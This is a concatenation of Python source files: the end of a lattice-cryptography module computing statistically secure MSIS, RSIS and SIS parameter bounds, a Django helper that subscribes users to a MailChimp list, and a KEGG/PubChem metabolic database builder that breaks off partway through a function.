    :math:`s`                    :math:`s`     Gaussian width (not stddev)
    :math:`N`                    :math:`n`     degree of ring polynomial
    ============================ ============= ============================================

    The number of elements in :math:`B_{m+d}(0, 2B)` can be estimated from above as :math:`|B_{m+d}(0, 2B)| \ll (2 \pi e /((m+d) n))^{(m+d) n/2} \cdot (2 B)^{(m+d) n}`. The scheme is statistically binding if the probability that non zero elements in :math:`B_{m+d}(0, 2B)` of radius :math:`2B` in :math:`\mathcal{R}_q^{m+d}` map to :math:`\mathbf{0}` in :math:`\mathcal{R}_q^{m}` is negligible. Hence, it must hold that :math:`|B_{m+d}(0, 2B)|/q^{m n} \leq 2^{-\texttt{sec}}` and we get:

    .. math::
        \left(\sqrt{\frac{2 \pi e}{(m+d) \cdot n}} \cdot 2 B\right)^{(m+d) \cdot n} &\leq 2^{-\texttt{sec}} \cdot q^{m\cdot n} \\
        B &\leq 2^{\frac{-\texttt{sec}}{(m+d)\cdot n} - 1} \cdot q^\frac{m}{m+d} \cdot \sqrt{\frac{(m+d)\cdot n}{2 \pi e}}\\

    We convert the bound :math:`B` to a Gaussian over :math:`\ell_2`-norm by following the procedure described in :ref:`to_Lp <to_Lp>`:

    .. math::
        s \approx x \sqrt{\frac{\pi}{(\texttt{sec} + 1) \ln(2)}}

    :ivar max_sigma: standard deviation :math:`\sigma`
    :ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
    """

    def __init__(self, sec, n, d, q, m):
        """
        :param sec: required bit security of MSIS instance
        :param n: degree of ring polynomial
        :param d: rank of module (or height of matrix)
        :param q: modulus
        :param m: number of samples (or width of matrix)
        """
        # TODO: check paramters
        # Largest ell_2 bound beta for which the instance stays statistically
        # binding; implements the inequality derived in the class docstring.
        max_beta = RR(
            2 ** (-sec / ((m + d) * n) - 1)
            * q ** (m / (m + d))
            * sqrt((m + d) * n / (2 * pi * e))
        )
        # convert beta bound to Gaussian width parameter
        self.max_s = max_beta * sqrt(pi / ((sec + 1) * log(2.0)))
        # presumably est.stddevf converts Gaussian width s to a standard
        # deviation -- TODO confirm against the estimator's definition
        self.max_sigma = est.stddevf(self.max_s)
        self.max_beta = norm.Lp(max_beta, 2, n * d)  # TODO: is the dimension correct?
        self.sec = sec
        self.n = n
        self.d = d
        self.q = q
        self.m = m

    def get_secret_distribution_max_width(self):
        # Widest Gaussian secret distribution that keeps this instance
        # statistically secure (non-componentwise over the full module).
        return distributions.GaussianSigma(
            sigma=self.max_sigma, q=self.q, componentwise=False, sec=self.sec
        )  # TODO check, specify dimensions? or not needed?
class StatisticalMatrixMSIS(StatisticalMSIS):
    r"""
    Statistically secure MSIS according to :cite:`DOTT21`, section 4.1,
    parametrized by the matrix dimensions instead of module rank and samples.
    For more details, see :class:`StatisticalMSIS`.

    :ivar max_sigma: standard deviation :math:`\sigma`
    :ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
    """

    def __init__(self, n, q, width, height, sec=None):
        r"""
        :param n: degree of ring polynomial
        :param q: modulus
        :param width: width of matrix :math:`\mathbf{A}`
        :param height: height of matrix :math:`\mathbf{A}`
        :param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion

        .. note:: NOTE(review): although ``sec`` is documented as optional, it is
           forwarded into arithmetic in :class:`StatisticalMSIS.__init__`
           (``2 ** (-sec / ...)``), so ``sec=None`` raises ``TypeError``; there is
           also no ``n >= sec`` check performed here -- confirm intended handling.
        """
        # Matrix-to-module translation per DOTT21: samples m = height,
        # module rank d = width - height (so width = m + d).
        super().__init__(n=n, q=q, d=width - height, m=height, sec=sec)
class StatisticalRSIS(StatisticalMSIS):
    r"""
    Statistically secure RSIS according to :cite:`DOTT21`, section 4.1.

    A ring instance is simply the module variant of rank :math:`d=1`; see
    :class:`StatisticalMSIS` for the derivation of the bounds.

    :ivar max_sigma: standard deviation :math:`\sigma`
    :ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
    """

    def __init__(self, sec, n, q, m):
        """
        :param sec: required bit security of the RSIS instance
        :param n: degree of ring polynomial
        :param q: modulus
        :param m: number of samples (or width of matrix)
        """
        # Delegate to the module case with rank one.
        super().__init__(sec=sec, n=n, q=q, m=m, d=1)  # TODO: check Gaussian
class StatisticalSIS(StatisticalMSIS):
    r"""
    Statistically secure SIS according to :cite:`DOTT21`, section 4.1.
    For details, see :class:`StatisticalMSIS` with degree of ring polynomial dimension :math:`n=1`, height of matrix becomes rank of modulus (i.e., :math:`d=n`).

    (Docstring fix: this class previously claimed to be "RSIS" -- it is the
    unstructured SIS wrapper.)

    :ivar max_sigma: standard deviation :math:`\sigma`
    :ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
    """

    def __init__(self, sec, n, q, m):
        """
        :param sec: required bit security of SIS instance
        :param n: height of matrix
        :param q: modulus
        :param m: width of matrix
        """
        # Unstructured SIS: ring degree 1, the matrix height plays the role of
        # the module rank d.
        super().__init__(sec=sec, n=1, d=n, q=q, m=m)
|
mailing_list.py | import threading
from mailchimp import Mailchimp, ListDoesNotExistError, EmailNotExistsError, ListAlreadySubscribedError, Error
from django.conf import settings
class SubscribeToMailingList(object):
    """Subscribe a user to the MailChimp mailing list on a background thread.

    Instantiating the class immediately spawns a daemon thread that performs the
    subscription, so construction never blocks the request cycle.
    """

    def __init__(self, email, first_name, last_name):
        """
        :param email: subscriber's email address
        :param first_name: subscriber's first name (sent as FNAME merge var)
        :param last_name: subscriber's last name (sent as LNAME merge var)
        """
        self.email = email
        self.first_name = first_name
        self.last_name = last_name
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()

    def print_error(self, err_msg):
        """Log a subscription failure with the subscriber's identity."""
        # Use a fresh name instead of rebinding the parameter (clearer intent).
        message = 'Failed to subscribe {first} {last}({email}) to mailing list: {err_msg}'.format(
            first=self.first_name, last=self.last_name, email=self.email, err_msg=err_msg)
        print(message)

    def run(self):
        """Perform the MailChimp subscription; returns False on any failure."""
        if settings.MAILCHIMP_API_KEY is None:
            self.print_error('MAILCHIMP_API_KEY not set')
            return False
        api_key = settings.MAILCHIMP_API_KEY
        list_id = settings.MAILCHIMP_SUBSCRIBE_LIST_ID
        api = Mailchimp(api_key)
        try:
            # Bug fix: first/last name were collected but never sent; forward
            # them via the standard FNAME/LNAME merge variables.
            api.lists.subscribe(
                list_id,
                {'email': self.email},
                merge_vars={'FNAME': self.first_name, 'LNAME': self.last_name})
        except (ListDoesNotExistError, EmailNotExistsError, ListAlreadySubscribedError, Error) as e:
            self.print_error(repr(e))
            return False
        return True
|
build_KEGG_db.py | from __future__ import print_function
__author__ = 'Leanne Whitmore'
__email__ = 'lwhitmo@sandia.gov'
__description__ = 'Build metabolic db using KEGG db'
from multiprocessing import Process, Queue
import re
import sqlite3
import urllib2
import httplib
import pubchempy
from tqdm import tqdm
from Database import query as Q
from sys import platform
if platform == 'darwin':
from indigopython130_mac import indigo
from indigopython130_mac import indigo_inchi
elif platform == "linux" or platform == "linux2":
from indigopython130_linux import indigo
from indigopython130_linux import indigo_inchi
elif platform == "win32" or platform == "win64":
from indigopython130_win import indigo
from indigopython130_win import indigo_inchi
IN = indigo.Indigo()
INCHI = indigo_inchi.IndigoInchi(IN)
KEGG = 'http://rest.kegg.jp/'
def BuildKEGG(types_orgs, inchidb, processors, currentcpds,
              num_organisms='all', num_pathways='all'):
    """Build metabolic database content from the KEGG REST service.

    Runs in four stages, each fanned out over ``processors`` worker processes:
    organism IDs, pathway IDs per organism, reaction IDs per pathway, and
    detailed reaction/compound information.  Results come back through a
    multiprocessing Queue.  NOTE: Python 2 code (``iteritems``, list-returning
    ``dict.keys()``).

    :param types_orgs: organism type filter ('all' or comma separated keywords)
    :param inchidb: whether compounds should be translated to InChI strings
    :param processors: number of concurrent worker processes per batch
    :param currentcpds: compounds already present in the target database
    :param num_organisms: limit on organisms retrieved, or 'all'
    :param num_pathways: limit on pathways per organism, or 'all'
    :returns: tuple (orgIDs, metabolic_clusters, reactioninfo, reactionIDs,
              cpd2inchi, inchi_cf, inchi_cas, compoundinfo)
    """
    types_orgs = types_orgs.lower()
    orgIDs = extract_KEGG_orgIDs(types_orgs, num_organisms)
    metabolic_clusters = {}
    pathwayIDs = {}
    pathwayIDs_set = set()
    removeorg = []
    output_queue = Queue()
    # Batch organisms into groups of `processors` (Py2: keys() is a list).
    args_organism = [orgIDs.keys()[i:i+processors]
                     for i in range(0, len(orgIDs.keys()), processors)]
    print ('STATUS: get KEGG pathway IDs')
    for orgs in tqdm(args_organism):
        processes = []
        for org in orgs:
            processes.append(Process(target=extract_pathwayIDs,
                                     args=(org, num_pathways, output_queue)))
        for p in processes:
            p.start()
        # One queue.get() per started process stands in for join().
        for p in processes:
            result_tuples = output_queue.get()
            pathwayIDs.update(result_tuples[0])
            removeorg.extend(result_tuples[1])
    # Drop organisms whose pathway list could not be retrieved.
    for orgID in removeorg:
        del orgIDs[orgID]
    cluster_count = 0
    # Cluster organisms that share an identical pathway list; each cluster is
    # represented by its first member's pathway list.
    for orgID, pathways in pathwayIDs.iteritems():
        for pathway in pathways:
            pathwayIDs_set.add(pathway)
        if metabolic_clusters:
            check = False
            for key in metabolic_clusters:
                if pathways == pathwayIDs[metabolic_clusters[key][0]]:
                    check = True
                    metabolic_clusters[key].append(orgID)
                    break
            if check is False:
                cluster_count += 1
                metabolic_clusters.setdefault(cluster_count, []).append(orgID)
        else:
            cluster_count += 1
            metabolic_clusters.setdefault(cluster_count, []).append(orgID)
    print ('STATUS: get KEGG reaction IDs')
    output_queue = Queue()
    pathwayIDs_set_list = list(pathwayIDs_set)
    args_pathways = [pathwayIDs_set_list[i:i+processors]
                     for i in range(0, len(pathwayIDs_set_list), processors)]
    pathway_reactionIDs = {}
    noreactions = []
    for pathways in tqdm(args_pathways):
        processes = []
        for pathway in pathways:
            processes.append(Process(target=extract_reactionIDs, args=(pathway, output_queue)))
        for p in processes:
            p.start()
        for p in processes:
            result_tuples = output_queue.get()
            pathway_reactionIDs.update(result_tuples[0])
            noreactions.extend(result_tuples[1])
    reactionIDs = {}
    reactions_set = set()
    # Flatten pathway reactions per organism; reactions_set deduplicates the
    # IDs so each reaction's details are fetched only once below.
    for orgID, pathways in pathwayIDs.iteritems():
        reactionIDs[orgID] = []
        for pathway in pathways:
            try:
                for reaction in pathway_reactionIDs[pathway]:
                    reactionIDs[orgID].append(reaction)
                    reactions_set.add(reaction)
            except KeyError:
                print ('WARNING: No reactions for '+str(pathway))
    reactions_set_list = list(reactions_set)
    reactioninfo_final = {}
    inchi_cf = {}
    inchi_cas = {}
    cpd2inchi_final = {}
    compoundinfo_final = {}
    output_queue = Queue()
    args_reactions = [reactions_set_list[i:i+processors]
                      for i in range(0, len(reactions_set_list), processors)]
    print ('STATUS: get KEGG reaction detailed information')
    for reactions in tqdm(args_reactions):
        processes = []
        for reaction in reactions:
            processes.append(Process(target=process_reaction,
                                     args=(reaction, inchidb, compoundinfo_final,
                                           cpd2inchi_final, inchi_cf, inchi_cas,
                                           currentcpds, output_queue)))
        for p in processes:
            p.start()
        for p in processes:
            result_tuples = output_queue.get()
            reactioninfo_final.update(result_tuples[0])
            cpd2inchi_final.update(result_tuples[1])
            inchi_cf.update(result_tuples[2])
            inchi_cas.update(result_tuples[3])
            compoundinfo_final.update(result_tuples[4])
    return(orgIDs, metabolic_clusters, reactioninfo_final,
           reactionIDs, cpd2inchi_final, inchi_cf, inchi_cas,
           compoundinfo_final)
def extract_KEGG_orgIDs(types_orgs, num_organisms):
    """Retrieve organism IDs in KEGG.

    :param types_orgs: 'all' or comma separated organism-type keywords matched
                       against the lineage column of ``list/organism``
    :param num_organisms: 'all' or a maximum number of organisms to collect
    :returns: dict mapping KEGG organism code -> organism name
    """
    print ('STATUS: get KEGG '+types_orgs+' organism IDs')
    orgIDs = {}
    darray = extract_KEGG_data(KEGG+'list/organism')
    # Bug fix: extract_KEGG_data returns None on network errors; the sibling
    # fetchers guard this, but this function previously iterated None and
    # crashed.  Return an empty dict instead.
    if not darray:
        print ('WARNING: could not retrieve KEGG organism list')
        return orgIDs
    if types_orgs == 'all':
        for value in tqdm(darray):
            array = value.split('\t')
            try:
                # array[1] is the organism code, array[2] its name.
                orgIDs[array[1]] = array[2]
            except IndexError:
                pass
            if num_organisms != 'all':
                if len(orgIDs) == int(num_organisms):
                    break
    else:
        types_orgs = re.sub(r'\s+', '', types_orgs)
        types_orgs_array = types_orgs.split(',')
        print (types_orgs_array)
        for value in tqdm(darray):
            array = value.split('\t')
            try:
                # array[3] is the taxonomy/lineage column; match any keyword.
                array[3] = array[3].lower()
                matches = []
                for org in types_orgs_array:
                    match = re.search(org, array[3])
                    if match:
                        matches.append(match)
                if matches:
                    print (array[3])
                    orgIDs[array[1]] = array[2]
            except IndexError:
                pass
            if num_organisms != 'all':
                if len(orgIDs) == int(num_organisms):
                    break
    print ('STATUS: {} organisms from KEGG'.format(len(orgIDs)))
    return orgIDs
def extract_pathwayIDs(orgID, num_pathways, output_queue):
    """Retrieve pathway IDs for one organism.

    Puts a tuple ``(pathwayIDs, removeorg)`` on ``output_queue`` where
    ``pathwayIDs`` maps the organism to its pathway IDs and ``removeorg`` lists
    the organism when its pathways could not be fetched.

    :param orgID: KEGG organism code
    :param num_pathways: 'all' or a maximum number of pathways to collect
    :param output_queue: multiprocessing queue receiving the result tuple
    """
    pathwayIDs = {}
    removeorg = []
    darray = extract_KEGG_data(KEGG+'list/pathway/'+orgID)
    if darray:
        for count1, value in enumerate(darray, start=1):
            array = value.split('\t')
            # Strip the "path:<org>" prefix, keeping the numeric map ID.
            array[0] = re.sub('path:'+orgID, '', array[0])
            pathwayIDs.setdefault(orgID, []).append(array[0])
            # Bug fix (off by one): the previous 0-based check let
            # num_pathways + 1 entries through; stop at exactly num_pathways,
            # consistent with the organism limiter in extract_KEGG_orgIDs.
            if num_pathways != 'all' and count1 == int(num_pathways):
                break
    else:
        print ('WARNING: Could not get pathways for '+orgID+' so removing it from organisms')
        removeorg.append(orgID)
    output_queue.put((pathwayIDs, removeorg))
def extract_reactionIDs(pathway, output_queue):
    """Collect the reaction IDs linked to one KEGG pathway map.

    Puts ``(reactionIDs, noreactions)`` on ``output_queue``: a mapping of the
    pathway to its reaction IDs, and a list holding the pathway when nothing is
    linked to it.
    """
    linked = {}
    missing = []
    darray = extract_KEGG_data(KEGG+'link/rn/map'+pathway)
    if not darray:
        print ('WARNING: No reactions linked to pathway '+str(pathway))
        missing.append(pathway)
    else:
        for line in darray:
            fields = line.split('\t')
            try:
                rxn = re.sub('rn:', '', fields[1])
            except IndexError:
                # Malformed/blank line without a second column -- skip it.
                continue
            linked.setdefault(pathway, []).append(rxn)
    output_queue.put((linked, missing))
def process_reaction(reactionID, inchidb, compoundinfo, cpd2inchi, inchi_cf, inchi_cas, currentcpds, output_queue):
    """Extract detailed info for one KEGG reaction and enqueue the result.

    Parses the flat-file record for ``reactionID`` (NAME, ENZYME, EQUATION),
    splits the equation into reactants and products, and runs every compound
    token through :func:`process_compound`.  The accumulated dictionaries are
    put on ``output_queue`` as
    ``(reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo)``.

    :param reactionID: KEGG reaction identifier (e.g. ``R00001``)
    :param inchidb: whether compounds should be translated to InChI strings
    :param compoundinfo: compound -> name mapping (updated in place)
    :param cpd2inchi: InChI -> KEGG compound ID mapping (updated in place)
    :param inchi_cf: InChI -> chemical formula mapping (updated in place)
    :param inchi_cas: compound -> CAS number mapping (updated in place)
    :param currentcpds: compounds already present in the target database
    :param output_queue: multiprocessing queue receiving the result tuple
    """
    reactioninfo = {}
    darray = extract_KEGG_data(KEGG+'get/'+reactionID)
    if darray:
        reactioninfo[reactionID] = {}
        reactioninfo[reactionID]['reactants'] = {}
        reactioninfo[reactionID]['products'] = {}
        for value in darray:
            array = value.split()
            if 'NAME' in array:
                # Only the first token of the name line is kept (original behavior).
                reactioninfo[reactionID]['name'] = array[1]
            if 'ENZYME' in array:
                reactioninfo[reactionID]['enzyme'] = array[1]
            if 'EQUATION' in array:
                array.remove('EQUATION')
                equation_string = ' '.join(array)
                # '<=>' marks a reversible reaction, '=>' an irreversible one.
                # Both sides are processed identically (this used to be ~30
                # duplicated lines per branch).
                if '<=>' in array:
                    reactioninfo[reactionID]['reversible'] = 'true'
                    reaction = equation_string.split(' <=> ')
                else:
                    reactioninfo[reactionID]['reversible'] = 'false'
                    reaction = equation_string.split(' => ')
                for side, is_prod in ((reaction[0], False), (reaction[1], True)):
                    for cpd in side.split(' + '):
                        (reactioninfo,
                         cpd2inchi_individual,
                         inchi_cf_individual,
                         inchi_cas_individual,
                         compoundinfo_individual) = process_compound(
                             cpd, reactionID, reactioninfo, is_prod,
                             inchidb, compoundinfo, cpd2inchi, inchi_cf,
                             inchi_cas, currentcpds)
                        cpd2inchi.update(cpd2inchi_individual)
                        inchi_cf.update(inchi_cf_individual)
                        inchi_cas.update(inchi_cas_individual)
                        compoundinfo.update(compoundinfo_individual)
        # Reactions without NAME/ENZYME lines get explicit 'None' markers.
        if 'enzyme' not in reactioninfo[reactionID].keys():
            reactioninfo[reactionID]['enzyme'] = 'None'
        if 'name' not in reactioninfo[reactionID].keys():
            reactioninfo[reactionID]['name'] = 'None'
    output_queue.put((reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo))
def process_compound(cpd, reactionID, reactioninfo, is_prod,
                     inchidb, compoundinfo, cpd2inchi, inchi_cf,
                     inchi_cas, currentcpds):
    """Extract info for one equation token and register the metabolite.

    ``cpd`` arrives as one token of a KEGG EQUATION side, e.g. ``"2 C00001"``
    or ``"C00002(n)"``.  The stoichiometric coefficient and any parenthesised
    qualifier are stripped, the compound is recorded in ``reactioninfo`` via
    :func:`add_metabolite`, and -- when ``inchidb`` is set -- the compound is
    translated to an InChI string through PubChem.

    :param cpd: raw compound token from the reaction equation
    :param reactionID: KEGG reaction the compound belongs to
    :param reactioninfo: reaction dictionary being filled
    :param is_prod: True for a product, False for a reactant
    :param inchidb: whether compounds should be stored as InChI strings
    :param compoundinfo: compound -> name mapping (updated in place)
    :param cpd2inchi: InChI -> KEGG compound ID mapping (updated in place)
    :param inchi_cf: InChI -> chemical formula mapping (updated in place)
    :param inchi_cas: compound -> CAS number mapping (updated in place)
    :param currentcpds: compounds already present in the target database
    :returns: tuple (reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo)
    """
    # Drop parenthesised qualifiers such as "(n)" at either end of the token.
    cpd = re.sub(r'\s*\(\S+\)$', '', cpd)
    cpd = re.sub(r'^\(\S+\)\s*', '', cpd)
    match = re.search(r'^\d', cpd)
    match2 = re.search(r'^\w+\s+', cpd)
    if match:
        # Bug fix: use the full leading integer -- the old code read only the
        # first digit, so a coefficient of e.g. 12 was recorded as 1.
        stoichiometry = int(re.search(r'^\d+', cpd).group(0))
        cpd = re.sub(r'^\d+ ', '', cpd)
    elif match2:
        # Non-numeric coefficient (e.g. "n") -- treat as 1 and strip it.
        stoichiometry = 1
        cpd = re.sub(r'^\w+\s+', '', cpd)
    else:
        stoichiometry = 1
    if cpd in compoundinfo and not inchidb:
        # Already named: just record the stoichiometry.
        reactioninfo = add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo)
    elif cpd not in compoundinfo and not inchidb:
        reactioninfo = add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo)
        darray = extract_KEGG_data(KEGG+'get/'+cpd)
        count_name = 0
        if darray:
            for value in darray:
                array = value.split()
                if 'NAME' in array:
                    count_name += 1
                    compoundinfo[cpd] = array[1]
            if count_name == 0:
                compoundinfo[cpd] = 'None'
        else:
            compoundinfo[cpd] = 'None'
    elif inchidb and cpd in cpd2inchi.values():
        # Already translated: look the KEGG ID back up to its InChI key
        # (Python 2 idiom: keys()/values() return parallel lists).
        reactioninfo = add_metabolite(reactionID, cpd2inchi.keys()[cpd2inchi.values().index(cpd)],
                                      stoichiometry, is_prod, reactioninfo)
    else:
        if cpd in currentcpds and 'c0' in currentcpds[cpd]:
            # Reuse the database's existing cytosol ID for this compound.
            reactioninfo = add_metabolite(reactionID, currentcpds[cpd]['c0'],
                                          stoichiometry, is_prod, reactioninfo)
        else:
            darray = extract_KEGG_data(KEGG+'get/'+cpd)
            if inchidb:
                # Translate KEGG compound -> PubChem SID -> CID -> InChI; any
                # failure along the way falls back to the KEGG ID itself.
                inchicpd = None
                if darray:
                    for value in darray:
                        array = value.split()
                        if 'PubChem:' in array:
                            index = array.index('PubChem:')
                            sid = array[index+1]
                            try:
                                substance = pubchempy.Substance.from_sid(sid)
                                substance_cids = substance.cids
                                if substance_cids:
                                    try:
                                        compounds = pubchempy.get_compounds(substance_cids[0])
                                        if compounds:
                                            inchicpd = compounds[0].inchi
                                            mol = INCHI.loadMolecule(inchicpd)
                                            # fp = mol.fingerprint('full')
                                            # buffer = fp.toBuffer()
                                            # buffer_array = [str(i) for i in buffer]
                                            # buffer_string = ','.join(buffer_array)
                                            cf = mol.grossFormula()
                                            cf = re.sub(' ', '', cf)
                                            cpd2inchi[inchicpd] = cpd
                                            # inchi_fp[inchicpd] = buffer_string
                                            inchi_cf[inchicpd] = cf
                                        else:
                                            inchicpd = cpd
                                    except (pubchempy.PubChemHTTPError, httplib.BadStatusLine,
                                            urllib2.URLError):
                                        inchicpd = cpd
                                else:
                                    inchicpd = cpd
                            except (pubchempy.PubChemHTTPError, httplib.BadStatusLine,
                                    urllib2.URLError):
                                print ('WARNING: Could not get substance for '+ sid)
                                inchicpd = cpd
                    if not inchicpd:
                        inchicpd = cpd
                else:
                    inchicpd = cpd
                reactioninfo = add_metabolite(reactionID, inchicpd,
                                              stoichiometry, is_prod, reactioninfo)
            else:
                reactioninfo = add_metabolite(reactionID, cpd,
                                              stoichiometry, is_prod, reactioninfo)
            count_name = 0
            # Bug fix: guard against darray being None (network failure); the
            # loop previously iterated None and raised TypeError.
            for value in (darray or []):
                array = value.split()
                if 'NAME' in array:
                    count_name += 1
                    if inchidb:
                        compoundinfo[inchicpd] = array[1]
                    else:
                        compoundinfo[cpd] = array[1]
                if 'CAS:' in array:
                    index = array.index('CAS:')
                    cas = array[index+1]
                    if inchidb:
                        inchi_cas[inchicpd] = cas
                    else:
                        inchi_cas[cpd] = cas
            if count_name == 0:
                if inchidb:
                    compoundinfo[inchicpd] = 'None'
                else:
                    compoundinfo[cpd] = 'None'
    return (reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo)
def add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo):
    """Record a compound with its stoichiometry under a reaction's side.

    :param reactionID: reaction whose entry in ``reactioninfo`` is updated
    :param cpd: compound identifier to record
    :param stoichiometry: stoichiometric coefficient for the compound
    :param is_prod: True to file under 'products', False under 'reactants'
    :param reactioninfo: reaction dictionary, mutated and returned
    :returns: the (mutated) ``reactioninfo`` dictionary
    """
    side = 'products' if is_prod else 'reactants'
    reactioninfo[reactionID][side][cpd] = stoichiometry
    return reactioninfo
def extract_KEGG_data(url):
    """Fetch a KEGG REST URL and return its payload split into lines.

    :param url: full KEGG REST endpoint to retrieve
    :returns: list of response lines, or None when the request fails
    """
    try:
        payload = urllib2.urlopen(url).read()
    except (httplib.BadStatusLine, urllib2.URLError):
        # Network/HTTP failure -- callers treat None as "no data".
        return None
    return payload.split('\n')
class CompileKEGGIntoDB(object):
    """Add KEGG info to a sqlite database.

    Downloads organisms, pathways, reactions and compounds via
    :func:`BuildKEGG`, then inserts them either into a pre-existing database
    (``add=True``) or into a freshly created one (``add=False``).
    """

    def __init__(self, database, type_org, inchidb, processors,
                 num_organisms, num_pathways, rxntype, add):
        """
        :param database: path to the sqlite database file
        :param type_org: organism type filter forwarded to BuildKEGG
        :param inchidb: whether compounds are stored as InChI strings
        :param processors: number of worker processes for KEGG retrieval
        :param num_organisms: limit on organisms to fetch, or 'all'
        :param num_pathways: limit on pathways per organism, or 'all'
        :param rxntype: reaction type tag stored with every reaction row
        :param add: True to extend an existing database, False to fill a new one
        """
        self.database = database
        self.inchidb = inchidb
        self.rxntype = rxntype
        self.currentcpds = {}
        self.conn = sqlite3.connect(self.database, check_same_thread=False)
        self.conn.text_factory = str
        self.cnx = self.conn.cursor()
        self.DB = Q.Connector(database)
        # Map kegg ID (col 3) -> {compartment (col 2): full ID (col 0)} for
        # every compound already in the database.
        cursor = self.cnx.execute('SELECT * from compound')
        for i in cursor.fetchall():
            self.currentcpds.setdefault(i[3], {})
            self.currentcpds[i[3]].setdefault(i[2], i[0])
        (self.orgIDs,
         self.metabolic_clusters,
         self.reactioninfo,
         self.reactionIDs,
         self.cpd2inchi,
         self.inchi_cf,
         self.inchi_cas,
         self.compoundinfo) = BuildKEGG(type_org, self.inchidb, processors,
                                        self.currentcpds, num_organisms, num_pathways)
        print ('STATUS: Adding kegg info to database')
        if add:
            self.add_to_preexisting_db()
        else:
            # fill_new_database works on a Connection directly (execute/commit).
            self.cnx = sqlite3.connect(database)
            self.fill_new_database()

    def add_to_preexisting_db(self):
        '''Add KEGG info to an already developed database.'''
        cytosol = '_'+self.DB.get_compartment('cytosol')[0]
        all_current_keggIDs = set(self.DB.get_all_keggIDs())
        # Map kegg reaction ID -> existing cytosol reaction ID so those rows
        # are reused instead of duplicated.
        all_cytosol_rxn = {}
        qres = self.cnx.execute("""SELECT * from reaction""")
        for result in qres.fetchall():
            if (re.search('c0', result[0]) is not None) and result[2] != 'None':
                all_cytosol_rxn[result[2]] = result[0]
        print ('STATUS: KEGG ..ENTERING MODELS')
        for orgID in self.orgIDs:
            self.cnx.execute("INSERT INTO model VALUES (?,?)", (orgID, self.orgIDs[orgID]+'_KEGG'))
        self.conn.commit()
        print ('STATUS: KEGG ..ENTERING CLUSTERS')
        # Local renamed from ``Q`` to stop shadowing the Database.query alias.
        qres = self.cnx.execute('''SELECT DISTINCT cluster_num FROM cluster''')
        uniq_clusters = [i[0] for i in qres.fetchall()]
        for key, orgIDs in self.metabolic_clusters.iteritems():
            for orgID in orgIDs:
                # Offset new cluster numbers past the ones already present.
                self.cnx.execute("INSERT INTO cluster VALUES (?,?)", (len(uniq_clusters)+key, orgID))
        self.conn.commit()
        # Get the compound IDs currently in the database.
        qres = self.cnx.execute("""SELECT ID from compound""")
        dbcpds = list(set(i[0] for i in qres.fetchall()))
        reaction_protein = []
        reaction_gene = []
        model_reactions = []
        model_compounds = []
        print ('STATUS: KEGG ..ENTERING MODEL REACTIONS, GENES, PROTEINS')
        for orgID, reactions in tqdm(self.reactionIDs.iteritems()):
            cpds_all = set()
            for reaction in reactions:
                # Reuse an existing cytosol reaction ID when one exists; the
                # two previous copy-pasted branches differed only in this ID.
                rxn_id = all_cytosol_rxn.get(reaction, reaction+cytosol)
                try:
                    rxn = self.reactioninfo[reaction]
                    model_reactions.append((rxn_id, orgID, rxn['reversible']))
                    try:
                        reaction_protein.append((rxn_id, orgID, rxn['enzyme']))
                    except KeyError:
                        reaction_protein.append((rxn_id, orgID, 'None'))
                    reaction_gene.append((rxn_id, orgID, 'None'))
                    cpds_all.update(rxn['reactants'])
                    cpds_all.update(rxn['products'])
                except KeyError:
                    print ('WARNING: No reaction info for {}'.format(reaction))
            for cpd in cpds_all:
                if cpd.endswith('c0'):
                    model_compounds.append((cpd, orgID))
                else:
                    model_compounds.append((cpd+cytosol, orgID))
        self.cnx.executemany("INSERT INTO model_compound VALUES (?,?)", model_compounds)
        self.cnx.executemany("INSERT INTO model_reaction VALUES (?,?,?)", model_reactions)
        self.cnx.executemany("INSERT INTO reaction_protein VALUES (?,?,?)", reaction_protein)
        self.cnx.executemany("INSERT INTO reaction_gene VALUES (?,?,?)", reaction_gene)
        self.conn.commit()
        print ('STATUS: KEGG ..ENTERING REACTIONS')
        all_cpds_to_add = set()
        reaction_reversibility = []
        reactions = []
        reaction_compounds = []
        for reaction in self.reactioninfo:
            # Only insert reactions whose kegg ID is not already present.
            if reaction not in all_current_keggIDs:
                reaction_reversibility.append((reaction+cytosol, self.reactioninfo[reaction]['reversible']))
                try:
                    reactions.append((reaction+cytosol, self.reactioninfo[reaction]['name'], reaction, self.rxntype))
                except KeyError:
                    reactions.append((reaction+cytosol, 'None', reaction, self.rxntype))
                for reactant in self.reactioninfo[reaction]['reactants']:
                    all_cpds_to_add.add(reactant)
                    if reactant.endswith('c0'):
                        reaction_compounds.append((reaction+cytosol, reactant, 0,
                                                   self.reactioninfo[reaction]['reactants'][reactant], 0))
                    else:
                        reaction_compounds.append((reaction+cytosol, reactant+cytosol, 0,
                                                   self.reactioninfo[reaction]['reactants'][reactant], 0))
                for product in self.reactioninfo[reaction]['products']:
                    all_cpds_to_add.add(product)
                    if product.endswith('c0'):
                        reaction_compounds.append((reaction+cytosol, product, 1,
                                                   self.reactioninfo[reaction]['products'][product], 0))
                    else:
                        reaction_compounds.append((reaction+cytosol, product+cytosol, 1,
                                                   self.reactioninfo[reaction]['products'][product], 0))
        self.cnx.executemany("INSERT INTO reaction_reversibility VALUES (?,?)",
                             reaction_reversibility)
        self.cnx.executemany("INSERT INTO reaction VALUES (?,?,?,?)",
                             reactions)
        self.cnx.executemany("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
                             reaction_compounds)
        self.conn.commit()
        compounds = []
        print ('STATUS: KEGG ..ENTERING COMPOUNDS')
        # Hoisted out of the loop: the compartment code is loop-invariant.
        compartment = self.DB.get_compartment('cytosol')[0]
        for cpd in all_cpds_to_add:
            # Skip compounds that already carry a compartment tag or exist.
            if cpd.endswith('_c0') or cpd+'_c0' in dbcpds:
                continue
            # InChI-keyed compounds keep their original KEGG ID in the kegg
            # column; a missing cpd2inchi entry is a real error and propagates
            # (as it did before).
            keggid = self.cpd2inchi[cpd] if cpd.startswith('InChI') else 'None'
